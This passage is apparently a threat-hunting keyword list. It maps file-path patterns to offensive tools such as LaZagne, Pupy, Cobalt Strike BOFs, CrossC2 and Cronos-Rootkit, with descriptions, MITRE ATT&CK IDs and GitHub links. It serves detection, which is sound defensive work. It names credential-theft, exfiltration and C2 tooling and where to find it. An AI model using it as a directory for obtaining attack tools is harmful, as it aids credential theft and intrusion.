APT29,C2,https://github.com/xforcered/CredBandit,1,1,N/A,10,10,218,25,2021-07-14T17:42:41Z,2021-03-17T15:19:33Z -*/creddump7*.py*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,1,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -*/creddump7/*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,1,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*/creddump7/*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/Credentials/*.ccache*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/Credentials/firefox_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/Credentials/msol_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/credentials/SudoSnatch*,offensive_tool_keyword,sudoSnatch,sudoSnatch payload grabs sudo password in plain text and imediately after target uses sudo command and sends it back to attacker remotely/locally.,T1552.001 - T1056.001 - T1071.001,TA0006 - TA0004 - TA0010,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SudoSnatch,1,1,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*/credentials/wifigrabber*,offensive_tool_keyword,wifigrabber,grab wifi password and exfiltrate to a given site,T1056.005 - T1552.001 - T1119 - T1071.001,TA0004 - TA0006 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber,1,1,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*/CredEnum.c*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/guervild/BOFs,1,1,N/A,10,10,153,27,2022-05-02T16:59:24Z,2021-03-15T23:30:22Z -*/CredEnum.cna*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/guervild/BOFs,1,1,N/A,10,10,153,27,2022-05-02T16:59:24Z,2021-03-15T23:30:22Z -*/CredEnum.h*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/guervild/BOFs,1,1,N/A,10,10,153,27,2022-05-02T16:59:24Z,2021-03-15T23:30:22Z -*/creditcards.py*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*/CredPhisher/*,offensive_tool_keyword,CredPhisher,Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function,T1056.002 - T1111,TA0004 ,N/A,N/A,Phishing,https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*/CredPrompt.exe*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/guervild/BOFs,1,1,N/A,10,10,153,27,2022-05-02T16:59:24Z,2021-03-15T23:30:22Z -*/CredPrompt/credprompt.c*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/guervild/BOFs,1,1,N/A,10,10,153,27,2022-05-02T16:59:24Z,2021-03-15T23:30:22Z -*/creds-*/creds.zip*,offensive_tool_keyword,DefaultCreds-cheat-sheet,One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password,T1110.001 - T1110.003,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/ihebski/DefaultCreds-cheat-sheet,1,1,N/A,N/A,10,4664,610,2023-07-15T22:16:49Z,2021-01-01T19:02:36Z -*/creds-summary.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/crlfinjection.txt*,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,1,N/A,N/A,,N/A,,, -*/Cronos-Rootkit*,offensive_tool_keyword,Cronos-Rootkit,Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/XaFF-XaFF/Cronos-Rootkit,1,1,N/A,N/A,8,742,176,2022-03-29T08:26:03Z,2021-08-25T08:54:45Z -*/CrossC2.*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*/CrossC2/*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*/CrossC2Kit*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*/CrossC2Kit/*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*/CrossC2-test*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*/CrossNet-Beta/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike payload generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dr0op/CrossNet-Beta,1,1,N/A,10,10,352,56,2022-07-18T06:23:16Z,2021-02-08T10:52:39Z -*/crunch-wordlist/*,offensive_tool_keyword,crunch,Generate a dictionary file containing words with a minimum and maximum length,T1596 - T1596.001,TA0043,N/A,N/A,Credential Access,https://sourceforge.net/projects/crunch-wordlist/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/crypt0p3g/*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files (BOF) for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/crypt0p3g/bof-collection,1,1,N/A,10,10,151,25,2022-12-05T04:49:33Z,2021-01-20T06:07:38Z -*/cs2modrewrite/*,offensive_tool_keyword,cobaltstrike,Convert Cobalt Strike profiles to modrewrite scripts,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/cs2modrewrite,1,1,N/A,10,10,553,114,2023-01-30T17:47:51Z,2017-06-06T14:53:57Z -*/CS-BOFs/*,offensive_tool_keyword,cobaltstrike,Collection of CobaltStrike beacon object files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/pwn1sher/CS-BOFs,1,1,N/A,10,10,100,23,2022-02-14T09:47:30Z,2021-01-18T08:54:48Z -*/CSExec.py*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,1,private github repo,10,,N/A,,, -*/CSExec.py.git*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,1,private github repo,10,,N/A,,, -*/csharp/process_injection/*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1027 - T1055 - T1070 - T1112 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*/CSharpWinRM*,offensive_tool_keyword,cobaltstrike,C++ WinRM API via Reflective DLL,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mez-0/winrmdll,1,1,N/A,10,10,138,27,2021-09-11T13:44:16Z,2021-09-11T13:40:22Z -*/C--Shellcode*,offensive_tool_keyword,cobaltstrike,python ShellCode Loader (Cobaltstrike&Metasploit),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/OneHone/C--Shellcode,1,1,N/A,10,10,21,2,2019-11-28T01:53:55Z,2019-11-05T09:48:14Z -*/CS-Loader.go*,offensive_tool_keyword,cobaltstrike,CS anti-killing including python version and C version,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Gality369/CS-Loader,1,1,N/A,10,10,751,149,2021-08-11T06:43:52Z,2020-08-17T21:33:06Z -*/CS-Loader/*,offensive_tool_keyword,cobaltstrike,CS 